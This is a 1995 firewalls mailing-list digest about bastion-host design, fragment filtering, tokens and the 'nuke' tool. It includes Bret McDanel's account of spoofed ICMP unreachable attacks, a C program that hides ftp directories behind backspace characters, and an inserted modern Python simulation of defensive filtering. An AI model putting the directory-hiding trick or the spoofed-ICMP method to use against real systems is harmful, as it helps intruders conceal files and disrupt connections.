My total budget (machine, hds, routers, ISDN link installation...) is 15000 $ canadian or roughly 10000 $ US and that's including all taxes, duties and such. My server will probably be an HP Netserver LC with Pentium 60, 32 Mb RAM and 3 Gb of disk space. No screen or keyboard 'cause they're switched. Forget SCO or Unixware because of $$$ but BSDI might be interesting. Any ideas of the price or e-mail address so I can try to plead with them ?

______________.
Martin Durand |
nit@llc.org   |

From firewalls-owner Mon May 8 08:10:03 1995
From: Alan Hannan
Message-Id: <199505081404.JAA23381@jayhawk.mid.net>
Subject: Announce: Firewall SNMP mailing list
To: firewalls@greatcircle.com
Date: Mon, 8 May 1995 09:04:58 -0500 (CDT)

Howdy. I have created a majordomo (Thanks Brent!) mailing list for the discussion of Firewall SNMP. It is my hope that this list can provide a forum through which a standardized SNMP MIB for firewalls can develop. I look forward to your discussions.

subscribe:
  Send email to majordomo@mid.net with the text "subscribe fw-snmp" in the mailing list

to send mail to the list:
  Send the mail to "fw-snmp@mid.net"

From firewalls-owner Mon May 8 08:14:14 1995
Date: Mon, 8 May 1995 08:42:03 -0400
From: bret@real.com (Bret McDanel)
Message-Id: <199505081242.IAA25611@real.com>
To: firewalls@greatcircle.com
Subject: Re: nuke vs firewalls

> > From a Newbie: What is nuke?
>
> It is a kewl tool, which forces a shutdown of all the TCP/IP connections
> to a system. All the users get disconnected. A detailed discussion of
> exactly how to use the nuke/sniffer combination to get the user-id and
> password of EVERYONE that uses the system really belongs in alt.2600.
>

Well, not quite.. It sends an ICMP host unreachable to a specific port.. You have to know which machine it should come from (ie you spoof the source addr).. This will work on 1 port per icmp packet.. it won't just blindly do em all.. There are kernel patches for this on suns, not sure about other machines, and tcp_info will tell you the machine that sent the packet, so you can try to figure out who is doing it..
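Two things in this digest come down to the same question, how much of a packet you can actually see before you act on it: the fragment argument between Darren Reed and Brent Chapman earlier (a rule that tests the ACK/"established" bit must not match a first fragment too short to carry that bit), and the spoofed ICMP host-unreachable trick Bret McDanel describes just above. The Python below is an added example, not code from the list or from any product mentioned; the addresses, ports, rules and connection table are constructed, and treating hard ICMP unreachable codes as fatal only while a connection is still in SYN_SENT is later common stack practice rather than anything the thread states.

```python
# Added example: one small IPv4 parser serving two checks from this digest.
# Addresses, ports, rules and the connection table below are constructed.
import socket
import struct
from collections import namedtuple

IPPROTO_ICMP, IPPROTO_TCP = 1, 6
TCP_ACK = 0x10
ICMP_DEST_UNREACH = 3
ICMP_SOFT_CODES = {0, 1, 5}  # net/host/source-route unreachable: soft errors (RFC 1122 4.2.3.9)

IPv4 = namedtuple("IPv4", "src dst proto frag_offset more_fragments payload")  # offset in 8-byte units
Rule = namedtuple("Rule", "action dst_port established", defaults=[False])  # dst_port None = any

def parse_ipv4(pkt: bytes) -> IPv4:
    """Decode the fixed IPv4 header, skipping options via IHL (no checksum verification)."""
    ihl = (pkt[0] & 0x0F) * 4 if pkt else 0
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or ihl < 20 or len(pkt) < ihl:
        raise ValueError("bad or truncated IPv4 header")
    _, _, _, _, flags_frag, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    return IPv4(socket.inet_ntoa(src), socket.inet_ntoa(dst), proto,
                flags_frag & 0x1FFF, bool(flags_frag & 0x2000), pkt[ihl:])

def build_ipv4(src, dst, proto, payload, frag_offset=0, more_fragments=False) -> bytes:
    """20-byte IPv4 header for the constructed test packets (checksum left zero)."""
    flags_frag = (0x2000 if more_fragments else 0) | (frag_offset & 0x1FFF)
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, flags_frag, 64,
                       proto, 0, socket.inet_aton(src), socket.inet_aton(dst)) + payload

def build_tcp(sport, dport, flags) -> bytes:
    """20-byte TCP header; the flags byte sits at offset 13."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)

def filter_packet(pkt: bytes, rules, pass_non_first_fragments=True) -> str:
    """First matching rule wins, default deny.  A rule needing a field this fragment does
    not carry (ports at TCP offset 0-3, flags at 13) cannot match it: Brent's 'must NOT match'."""
    p = parse_ipv4(pkt)
    if p.frag_offset != 0:
        # Non-first fragment: no transport header to inspect at all; site policy decides.
        return "permit" if pass_non_first_fragments else "deny"
    for r in rules:
        if r.dst_port is not None:
            if p.proto != IPPROTO_TCP or len(p.payload) < 4:
                continue
            if struct.unpack("!H", p.payload[2:4])[0] != r.dst_port:
                continue
        if r.established:
            if p.proto != IPPROTO_TCP or len(p.payload) < 14:
                continue  # ACK bit is not in this fragment, so the rule cannot match
            if not p.payload[13] & TCP_ACK:
                continue
        return r.action
    return "deny"

def icmp_unreach_verdict(pkt: bytes, conns: dict) -> tuple:
    """Should an ICMP destination-unreachable abort a TCP connection?  conns maps
    (local_ip, local_port, remote_ip, remote_port) -> state; returns (abort, reporter_ip)."""
    outer = parse_ipv4(pkt)  # outer.src is the reporter tcp_info shows you; log it either way
    if (outer.proto != IPPROTO_ICMP or len(outer.payload) < 8 + 20 + 8
            or outer.payload[0] != ICMP_DEST_UNREACH):
        return (False, outer.src)
    inner = parse_ipv4(outer.payload[8:])  # quoted header of the datagram that supposedly failed
    if inner.proto != IPPROTO_TCP or len(inner.payload) < 4:
        return (False, outer.src)
    sport, dport = struct.unpack("!HH", inner.payload[:4])
    state = conns.get((inner.src, sport, inner.dst, dport))
    if state is None or outer.payload[1] in ICMP_SOFT_CODES:
        return (False, outer.src)  # no such connection, or a soft error: keep the connection
    # Hard codes (2-4): abort only while still connecting, the rule later stacks settled on.
    return (state == "SYN_SENT", outer.src)

OUTSIDE, MAILHOST, REPORTER = "192.0.2.10", "198.51.100.25", "203.0.113.7"  # constructed
RULES = [Rule("permit", 25), Rule("permit", None, established=True)]

def demo_filter() -> dict:
    """Constructed packets for the cases argued in the fragment thread."""
    tcp = build_tcp(40000, 6000, TCP_ACK)
    smtp_syn = build_ipv4(OUTSIDE, MAILHOST, IPPROTO_TCP, build_tcp(40000, 25, 0x02))
    # Darren's "MTU of 28": first fragment carries only 8 bytes of TCP (ports, seq), no flags.
    tiny_first = build_ipv4(OUTSIDE, MAILHOST, IPPROTO_TCP, tcp[:8], more_fragments=True)
    tail = build_ipv4(OUTSIDE, MAILHOST, IPPROTO_TCP, tcp[8:], frag_offset=1)
    return {"smtp_syn": filter_packet(smtp_syn, RULES),
            "any_ack": filter_packet(build_ipv4(OUTSIDE, MAILHOST, IPPROTO_TCP, tcp), RULES),
            "tiny_first": filter_packet(tiny_first, RULES),
            "tail_default": filter_packet(tail, RULES),
            "tail_strict": filter_packet(tail, RULES, pass_non_first_fragments=False)}

def demo_icmp() -> dict:
    """Spoofed host- and port-unreachable messages aimed at known connections."""
    conns = {(MAILHOST, 25, OUTSIDE, 40000): "ESTABLISHED",
             (MAILHOST, 33000, OUTSIDE, 80): "SYN_SENT"}
    def unreach(code, quoted):  # ICMP header (type, code, csum, unused) + quoted datagram
        return build_ipv4(REPORTER, MAILHOST, IPPROTO_ICMP,
                          struct.pack("!BBHI", ICMP_DEST_UNREACH, code, 0, 0) + quoted)
    q_est = build_ipv4(MAILHOST, OUTSIDE, IPPROTO_TCP, build_tcp(25, 40000, TCP_ACK)[:8])
    q_syn = build_ipv4(MAILHOST, OUTSIDE, IPPROTO_TCP, build_tcp(33000, 80, 0x02)[:8])
    return {"host_unreach_established": icmp_unreach_verdict(unreach(1, q_est), conns),
            "port_unreach_established": icmp_unreach_verdict(unreach(3, q_est), conns),
            "port_unreach_syn_sent": icmp_unreach_verdict(unreach(3, q_syn), conns)}
```

The tiny first fragment is denied not because a rule says so but because the only rule that could have permitted it cannot see the bit it needs, which is the behaviour Brent asks vendors to confirm.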
From firewalls-owner Mon May 8 08:15:09 1995
From: "Marcus J. Ranum"
Message-Id: <12166.9505081417@illuminati>
Subject: Re: Source Code
To: mcr@milkyway.com (Michael Richardson)
Date: Mon, 8 May 1995 10:17:51 -0400 (EDT)
Cc: hcb@clark.NET, firewalls@greatcircle.com
In-Reply-To: <199505071614.MAA19029@metis.milkyway.com> from "Michael Richardson" at May 7, 95 12:14:58 pm
Organization: Trusted Information Systems, Inc. Glenwood, MD
Phone: 301-854-6889
Coredump: Infocalypse Now!!!

[WARNING: silliness below]

>>Complain all you like about software; there's nothing like a
>>beta test on your body! :-)
>
> The question is, Marcus, did S/HE use formal methods to design us? :-)

This is an important and serious issue! I think that it's hard to say. There is contradictory evidence on both sides. Let me present it and you be the judge:

The current design clearly has lots of error-correction and runtime error detection/termination built in. When genetic material is damaged, the cell (usually) dies; there are mechanisms built in to perform active defense against error conditions. The defenses and mechanisms occasionally get things "wrong" and fail. Intermittent failures such as Lupus and cancer argue that the system was not designed formally, *OR* that if it was designed with formal specifications, that the formalism was wrong. :)

One thing people forget about formal specs is that they are *models* that attempt to prove that the *model* is self-consistent. The relationship between the model and reality is based largely on hope or "convincing argument.*" Formal does not mean "accurate" or "correct."

I won't touch the evolution versus creation debate, other than to observe that evolution and formal methods appear to be mutually exclusive. :)

Current humanity couldn't even reach B2, according to the Orange Book:

    B2: CHANGE: All discovered flaws shall be corrected and the TCB retested to demonstrate that they have been eliminated and that new flaws have not been introduced.

To me the most convincing arguments have to do with time. If humanity had been designed using formal methods, we wouldn't even be in prerelease yet, let alone in production. The seven days, of course, might have been metaphorical: a seven day implementation period following billions and billions of years of design and specification. :)

mjr.
----
(* The appendix of the Orange Book reads:

    Formal Proof - A complete and convincing mathematical argument, presenting the full logical justification for each proof step, for the truth of a theorem or set of theorems. The formal verification process uses formal proofs to show the truth of certain properties of formal specification and for showing that computer programs satisfy their specifications.

    A1: CHANGE: The FTLS shall be shown to be an accurate description of the TCB interface. A convincing argument shall be given that the DTLS is consistent with the model and a combination of formal and informal techniques shall be used to show that the FTLS is consistent with the model.
This could be paraphrased as "proof by vigorous hand waving" ) From firewalls-owner Mon May 8 09:50:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03017 for firewalls-outgoing; Mon, 8 May 1995 08:43:48 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03010 for ; Mon, 8 May 1995 08:43:39 -0700 From: John_Reinke@pcmailgw.ml.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09986; Mon, 8 May 95 08:46:08 -0400 Date: Mon, 8 May 95 08:46:08 -0400 Message-Id: <9505081246.AA09986@uvs1.orl.mmc.com> To: firewalls@greatcircle.com@uvs1.dnet.mmc.com Subject: Re: One Time Password Tokens Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett, It may be appropriate to call the "firewall-ers" attention to this month's issue of Data Communications magazine which reviews several token solutions. Everyone appeared to have something the reviewer did not like. John Reinke This opinions are mine and not that of my employer -- a not clueless corporation -- just "thrifty"? _____________________________ Reply Separator _________________________________ Subject: One Time Password Tokens Author: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) at PROFGTWY Date: 5/7/95 8:18 AM Basically there are two types of tokens today, time synchronous and challenge response. 
Both work well (one went white water rafting in Alaska with a SecurID in my wallet - it survived and have been using From firewalls-owner Mon May 8 10:02:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03339 for firewalls-outgoing; Mon, 8 May 1995 09:07:17 -0700 Received: from ACCDVM.ACCD.EDU (accdvm.accd.edu [204.158.0.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03334 for ; Mon, 8 May 1995 09:07:12 -0700 From: ALVAREZ@ACCDVM.ACCD.EDU Message-Id: <199505081607.JAA03334@miles.greatcircle.com> Received: from ACCDVM.ACCD.EDU by ACCDVM.ACCD.EDU (IBM VM SMTP V2R2) with BSMTP id 7407; Mon, 08 May 95 11:07:28 CST Date: Mon, 8 May 95 11:07:27 CST To: Firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk subscrib From firewalls-owner Mon May 8 10:38:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03261 for firewalls-outgoing; Mon, 8 May 1995 09:02:34 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03256 for ; Mon, 8 May 1995 09:02:31 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA18565; Mon, 8 May 1995 09:47:10 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA07146; Mon, 8 May 1995 09:47:07 -0400 Message-Id: <9505081347.AA07146@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com (Firewalls Mailing List) Date: Mon, 8 May 1995 09:47:02 -0500 Subject: security of RPC Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 8 May 95 at 0:26, Matthew K was heard to utter: > SecureRPC has a mechanism that does exactly this.. 
has done for > years, and yes RPC is available for platforms other than Un*x I've been meaning to ask this one for a while. Now is as good a time as any. I thought RPC-based servers used dynamically assigned ports. If this is true, then isn't SecureRPC an oxymoron? (Honest question - no sarcasm intended.) -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## Life is like a boxing chocolate ## From firewalls-owner Mon May 8 10:49:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04417 for firewalls-outgoing; Mon, 8 May 1995 10:29:38 -0700 Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.6.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04410 for ; Mon, 8 May 1995 10:29:35 -0700 Received: from ris1.UUCP (jabrwock@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id MAA22514 for GreatCircle.COM!firewalls; Mon, 8 May 1995 12:10:28 -0500 Received: by ris1.nmti.com (smail2.5) id AA11669; 8 May 95 10:35:33 CDT (Mon) Received: by sonic.nmti.com; id AA08745; Mon, 8 May 1995 10:56:03 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9505081556.AA08745@sonic.nmti.com.nmti.com> Subject: Re: fw newbie needs validat To: firewalls@GreatCircle.COM Date: Mon, 8 May 1995 10:56:02 -0500 (CDT) In-Reply-To: <199505081349.JAA27112@biko.llc.org> from "Martin Durand" at May 8, 95 09:49:33 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 503 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Why don't you spend some more and get the commercial BSDI Unix instead of > FreeBie-SD ? I run FreeBSD and BSDI both, and I'm a pretty competant UNIX weenie... I'm currently supporting OSF/1, SunOS, Solaris, System V R3 and R4, and Xenix-286 as well as BSD... and FreeBSD is at least as solid as BSDI, and much more so than anything else I work with. I've got BSDI on my firewall and more than once I've wished it was FreeBSD instead. 
FreeBSD is in no wise a step down from BSDI or commercial UNIX.

From firewalls-owner Mon May 8 11:14:53 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04685 for firewalls-outgoing; Mon, 8 May 1995 10:48:32 -0700
Received: from armitage.cyberspace.com (armitage.cyberspace.com [199.2.48.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04680 for ; Mon, 8 May 1995 10:48:28 -0700
Received: from case (case.cyberspace.com) by armitage.cyberspace.com (4.1/SMI-4.1) id AA13614; Mon, 8 May 95 10:48:35 PDT
Date: Mon, 8 May 95 10:48:35 PDT
From: billcurr@cyberspace.com (Bill Curr)
Message-Id: <9505081748.AA13614@armitage.cyberspace.com>
Received: by case (4.1/SMI-4.1) id AA14534; Mon, 8 May 95 10:49:44 PDT
Subject: BorderWare (previously "JANUS")
To: Firewalls@GreatCircle.COM
X-Mailer: AIR Mail 3.X (SPRY, Inc.)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

With all the discussions about different FW products, I have yet to see mention of a product previously known as "JANUS" but now called "BorderWare FireWall Server." Does anyone have experience or input they care to share on this product?

Thanks in advance!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
"Printmaker gone digital"
billcurr@cyberspace.com
http://www.cyberspace.com/billcurr
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From firewalls-owner Mon May 8 11:42:43 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05134 for firewalls-outgoing; Mon, 8 May 1995 11:17:07 -0700
Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05128 for ; Mon, 8 May 1995 11:16:59 -0700
Received: from mail.orkand.com by relay1.UU.NET with SMTP id QQyowf10261; Mon, 8 May 1995 14:15:11 -0400
Received: from cc:Mail SMTPLINK 2.1 by mail.orkand.com id AA799957921; Mon, 08 May 95 11:29:27 EST
Date: Mon, 08 May 95 11:29:27 EST
From: "Michael L. Sapp"
Encoding: 37 Text
Message-Id: <9504087999.AA799957921@mail.orkand.com>
To: firewalls@greatcircle.com
Subject: Re: IP Packet Filtering
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

So it has been written...

>>I'd like to suggest that anyone who filters by port or the "established"
>>bit in their firewall add a rule which works *before* anything which might
>>match that description to drop _all_ fragmented IP packets. They can pose
>>a very large problem and rather than speculate about whether your vendor's
>>filtering does it "right" or can handle it at all, it is better to just
>>make yourself immune.
>>
>>I can't see anything in the FAQ about this and it has been quite a while
>>since I have seen anyone ask about this.
>
> Wait a sec... What's the problem with fragmented packets? Most filtering
> systems apply filtering only to the first fragment, and simply let all
> non-first fragments through. The assumption is that, if the filtering
> system decides to drop the first fragment, it doesn't matter if the rest
> get through, because the destination system won't be able to reassemble the
> packet without the first fragment. It doesn't depend on the destination's
> implementation; if the destination never sees the first fragment, it simply
> _can't_ reassemble the packet, because it doesn't have all the data.

Ok, so now we have had a nice little technical/philosophical discussion on this point ;) I have a real question before I decide which side to join ranks. Can I do this kind of filtering (dropping fragments that is) on a Cisco router with a recent software rev? I'm always looking for ways to improve my front line packet filter.

Sorry for cutting to the chase so soon...

Mike Sapp
Director, Computer Center
The Orkand Corporation
msapp@orkand.com

The usual legal stuff would go here...if my employer knew enough to care.

From firewalls-owner Mon May 8 12:18:00 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05418 for firewalls-outgoing; Mon, 8 May 1995 11:38:45 -0700
Received: from ban-unix.os.dhhs.gov (B11WDC-IR06B.os.dhhs.gov [158.70.252.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA05413 for ; Mon, 8 May 1995 11:38:43 -0700
Received: FROM X400MTA.ban-unix.os.dhhs.gov BY ban-unix.os.dhhs.gov ; 8 MAY 95 14:39:21 EDT
Date: 8 MAY 95 08:06:44 EDT
From: GFortwen@os.dhhs.gov
Subject: re: Firewall-1 Pros and Cons
To: firewalls@GreatCircle.COM
MIME-Version: 1.0
X-Mailer: 2.3.5 ZOOMIT X.400/SMTP Dual Stack
X-Complete-Subject: re: Firewall-1 Pros and Cons
Message-ID: <0000rpddzfjp.0000qyaeqiiy@os.dhhs.gov>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I am also interested in any information anyone may have.
George Fortwengler
gfortwen@os.dhhs.gov
Voice: (202) 690-5704
Fax : (202) 651-7401

From firewalls-owner Mon May 8 12:18:58 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05579 for firewalls-outgoing; Mon, 8 May 1995 11:50:20 -0700
Received: from ees1a0.engr.ccny.cuny.edu (ees1a0.engr.ccny.cuny.edu [134.74.16.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA05574 for ; Mon, 8 May 1995 11:50:15 -0700
Received: by ees1a0.engr.ccny.cuny.edu (4.1/SMI-4.1-940815-1) id AA16754; Mon, 8 May 95 14:50:06 EDT
Date: Mon, 8 May 1995 14:50:05 -0400 (EDT)
From: Dan Schlitt
To: Bret McDanel
Cc: firewalls@greatcircle.com
Subject: Re: nuke vs firewalls
In-Reply-To: <199505081242.IAA25611@real.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The version of nuke which was left on one of our machines by a cracker seemed to be pretty flexible in the kind of ICMP packets that it could generate. The default was as you describe but the possibilities looked to be pretty broad.
/dan

-- 
Dan Schlitt                        School of Engineering Computer Systems
dan@ee-mail.engr.ccny.cuny.edu     City College of New York
(212)650-6760                      New York, NY 10031

From firewalls-owner Mon May 8 12:19:56 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05973 for firewalls-outgoing; Mon, 8 May 1995 12:05:24 -0700
Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA05967 for ; Mon, 8 May 1995 12:05:21 -0700
Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8Y7q-0002IqC; Mon, 8 May 95 12:05 PDT
Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA20987; Mon, 8 May 1995 12:05:46 +0800
Date: Mon, 8 May 1995 12:05:46 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
Message-Id: <9505081905.AA20987@brittany.oes.amdahl.com>
To: chris@sandpiper.com
Subject: Re: Help with begining options?
Cc: firewalls@greatcircle.com
X-Sun-Charset: US-ASCII
content-length: 2247
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I got several requests for more information about how people can hide directories in your ftp site. Here are some simple examples.

> I am not quite sure what you mean by this. I tried mkdir "a b" and mkdir " "
> and both were 'visible' with ls. How am I misunderstanding you?

Yes, as I stated in the original post, there's still a space left for it in the listing. It's not at all obvious how to cd to it, rmdir it etc... Furthermore, it's often missed in a casual listing.

The thing I was talking about are directory names like " \b". This shows no clue. It could also be something like "hack\b\b\bdir\b\b", which would show as "hd". This is almost impossible to deal with, unless you treat it as h*d*, but how would you know to do that?
Here's a small program that illustrates it:

#include <sys/stat.h>
#include <sys/types.h>

/* Creates a directory whose name is "my", two backspaces, "hack", three
   backspaces, "dir", two backspaces: 16 bytes that a terminal draws as "hd". */
int main(int argc, char **argv)
{
    mkdir("my\b\bhack\b\b\bdir\b\b", 0777);
    return 0;
}

Makefile     ipval.C            test*     testC.o
add_tabs.c   math.C             test.cc   testREUSE.cc
binout.cc    memsize.C          test.o    testc*
date.C       hd/  test.sh*  testc.c
hw1.1*       rmit.c             testC*    time.C
hw1.1.cc     strang_proto.c     testC.cc  timers.C

You can see the alignment problems that show up. Unfortunately most people would be unaware of the true significance of this and not realise that 14 characters are not shown, the 7 backspaces, and the 7 characters they erased. They think that they are hitting some weird bug in ls. If you know the secret you can get in quite easily, for example with this one, using my*.

Patrick
_______________________________________________________________________
/ These opinions are mine, and not Amdahl's (except by coincidence;).  \
|                                                          (\           |
| Patrick J. Horgan     Amdahl Corporation                  \\  Have    |
| patrick@amdahl.com    1250 East Arques Avenue              \\ _ Sword  |
| Phone : (408)992-2779 P.O. Box 3470 M/S 316                 \\/ Will   |
| FAX   : (408)773-0833 Sunnyvale, CA 94088-3470             _/\\ Travel |
\___________________________O16-2294________________________\)__________/

From firewalls-owner Mon May 8 12:21:01 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05742 for firewalls-outgoing; Mon, 8 May 1995 11:56:59 -0700
Received: from peritus.com (benden.peritus.com [199.26.190.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05728 for ; Mon, 8 May 1995 11:56:53 -0700
Received: from minerva.westboro-ma.peritus.com (minerva.westboro-ma.peritus.com [199.26.191.70]) by peritus.com (sendmail 8.6.12/Peritus-3.0) with ESMTP for id OAA05067; Mon, 8 May 1995 14:38:27 -0400
Date: Mon, 8 May 1995 14:38:25 -0400
From: peterson@minerva.westboro-ma.peritus.com (David Peterson)
Received: by minerva.westboro-ma.peritus.com (8.6.9/Peritus-3.0) id OAA03705; Mon, 8 May 1995 14:38:25 -0400
Message-Id: <199505081838.OAA03705@minerva.westboro-ma.peritus.com>
To: Firewalls@GreatCircle.COM
Subject: Re: Help with begining options?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

patrick@oes.amdahl.com (Patrick Horgan) writes:

> Hello Ben.
>
> >My current design consists of a router to connect to the 56k or ISDN link.
> >The router dumps into an unsecure subnet that consists of whatever
> >sacrificial lamb machines I have serving the outside world, and the Firewall.
>
> Here's a danger. You sometimes hear people talk about sacrificial lamb
> machines, (anyone know the reference for the first occurrence?) It's a
> real danger to think this way. These machines are the closest machines
> on the internet to your "secure" machines. That means that their security
> profile should be as high as your firewall. If they aren't EXTREMELY
> secure, you're letting all sorts of riff-raff set up shop on your
> doorstep. The least consequence of this is that you'll be embarrassed
> when a security officer at another shop calls you up and wants to know
> why an attack is originating from one of your machines, or a court
> order is served seizing one or more of your machines because they
> harbor stolen software, (warez d00d!) How about finding out that
> someone is snooping all the passwords of all the users logging into
> machines on your site from outside, or vice-versa? Please be careful:)

Here's a design that should reduce the threat to you in case the public (sacrificial lamb) host is compromised:

                    +-----------+             +---------+
Internet -----------| Screening |-------------| Bastion |-------- Internal
Provider       sync1|  Router   |enet1        |  Host   |         Network
                    +-----------+             +---------+
                          |enet2
                          |
                     +--------+
                     | Public |
                     |  Host  |
                     +--------+

The screening router applies its filtering rules to the sync1 and enet2 interfaces. At a minimum, source-spoofed packets and dangerous ICMP packets such as REDIRECTs should be rejected.
In this scenario, compromising the public host does not compromise either the internal network or the legitimate connections from the bastion host to the Internet. It can still give you a 'public relations' black eye or be used to launch attacks back out into the Internet, but these are different problems.

---
David Peterson                   | I have sworn, upon the altar of God, eternal
Peritus Software Services        | hostility against every form of tyranny over
dpeterson@peritus.com            | the mind of man.
                                 |                        --Thomas Jefferson
peterson@warpdrive.Milford.MA.US | Opinions expressed within: Mine! All Mine!

From firewalls-owner Mon May 8 12:40:26 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07164 for firewalls-outgoing; Mon, 8 May 1995 12:23:20 -0700
Received: from bootes.sds.no (bootes.sds.no [139.105.192.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07149 for ; Mon, 8 May 1995 12:22:53 -0700
Received: by bootes.sds.no (5.65/DEC-Ultrix/4.3) id AA16236; Mon, 8 May 1995 21:23:22 +0200
Date: Mon, 8 May 1995 21:25:10 CST
From: toreh
Subject: Re: Pentagon security professionals
To: firewalls@greatcircle.com
Message-Id:
Priority: Normal
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 3 May 1995 22:42:01 -0400 (EDT) Dr. Frederick B. Cohen wrote:

> From: Dr. Frederick B. Cohen
> Date: Wed, 3 May 1995 22:42:01 -0400 (EDT)
> Subject: Pentagon security professionals
> To: firewalls@greatcircle.com
>
> Boy - you firewallers are touchy aren't you. Someone makes a
> few comments about national security and everyone hops on the posting
> party like they were posting something more interesting and open
> discussion of such things is somehow wrong. I thought the posting was
> entirely appropriate but then many of my postings are hated as well. So
> here's my nickle:
>
> DISA is generally far better at security than that example
> showed. Furthermore, they are understaffed and overworked and defending
> our country (the US) against ongoing attacks. If you're not from the US
> try not to be offended by a little bit of patriotism. Our country needs
> defending and we help to defend much of the rest of the world.

Boy, you sure are taking it on! Defending us from the martians?

>

-- tore

From firewalls-owner Mon May 8 13:13:01 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06240 for firewalls-outgoing; Mon, 8 May 1995 12:15:01 -0700
Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA06231 for ; Mon, 8 May 1995 12:14:59 -0700
Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8YHA-0001ENC; Mon, 8 May 95 12:15 PDT
Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA21031; Mon, 8 May 1995 12:15:30 +0800
Date: Mon, 8 May 1995 12:15:30 +0800
From: patrick@oes.amdahl.com (Patrick Horgan)
Message-Id: <9505081915.AA21031@brittany.oes.amdahl.com>
To: firewalls@greatcircle.com
Subject: Announcing the list on firewalls.
X-Sun-Charset: US-ASCII
content-length: 1181
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

There's a new list set up for discussing, and creating a firewall mib(s). The list server was kindly set up by Michael Richardson, mcr@milkyway.com, and we will soon start discussion on it.

To join the list, send mail to Majordomo@milkyway.com, with this in the body:

subscribe firewall-mib
end

I invite all interested parties to participate or lurk, I hope we'll have someone from CheckPoint Technologies on the team since they've already done some work in this area, and I would think would have an interest in promoting their work into a standard.

Patrick
_______________________________________________________________________
/ These opinions are mine, and not Amdahl's (except by coincidence;).  \
|                                                          (\           |
| Patrick J. Horgan     Amdahl Corporation                  \\  Have    |
| patrick@amdahl.com    1250 East Arques Avenue              \\ _ Sword  |
